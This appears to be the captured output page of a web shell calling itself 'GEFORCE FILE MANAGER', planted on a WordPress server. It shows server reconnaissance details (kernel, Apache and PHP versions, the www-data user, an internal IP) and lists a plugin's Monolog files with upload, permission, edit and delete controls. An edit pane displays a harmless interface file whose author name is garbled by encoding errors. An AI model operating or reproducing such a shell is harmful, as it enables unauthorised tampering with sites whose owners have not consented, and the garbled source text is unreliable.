[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
wp-optimize
/
vendor
/
monolog
/
monolog
/
src
/
Monolog
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
π Formatter
SET
[ DEL ]
π Handler
SET
[ DEL ]
π Processor
SET
[ DEL ]
π DateTimeImmutable.php
1,085 B
SET
[ EDIT ]
|
[ DEL ]
π ErrorHandler.php
10,474 B
SET
[ EDIT ]
|
[ DEL ]
π Logger.php
18,647 B
SET
[ EDIT ]
|
[ DEL ]
π Registry.php
4,002 B
SET
[ EDIT ]
|
[ DEL ]
π ResettableInterface.php
1,004 B
SET
[ EDIT ]
|
[ DEL ]
π SignalHandler.php
4,062 B
SET
[ EDIT ]
|
[ DEL ]
π Utils.php
8,820 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: ResettableInterface.php
<?php declare(strict_types=1); /* * This file is part of the Monolog package. * * (c) Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog; /** * Handler or Processor implementing this interface will be reset when Logger::reset() is called. * * Resetting ends a log cycle gets them back to their initial state. * * Resetting a Handler or a Processor means flushing/cleaning all buffers, resetting internal * state, and getting it back to a state in which it can receive log records again. * * This is useful in case you want to avoid logs leaking between two requests or jobs when you * have a long running process like a worker or an application server serving multiple requests * in one process. * * @author GrΓ©goire Pineau <lyrixx@lyrixx.info> */ interface ResettableInterface { /** * @return void */ public function reset(); }